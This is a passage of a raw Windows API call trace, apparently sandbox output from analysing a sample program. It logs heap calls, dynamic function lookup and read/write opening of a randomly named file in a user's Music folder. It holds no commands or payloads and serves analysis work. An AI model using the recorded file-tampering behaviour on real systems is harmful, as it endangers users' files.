lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0181.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0181.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923a78 [0181.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", cchWideChar=78, lpMultiByteStr=0x923a78, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpUsedDefaultChar=0x0) returned 78 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.411] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\9zmv2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9c) returned 0x8f9100 [0181.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x8f9100, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a") returned 78 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.417] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0181.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.419] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0181.419] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.420] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0181.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0181.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.422] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.422] CloseHandle (hObject=0x138) returned 1 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.423] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, 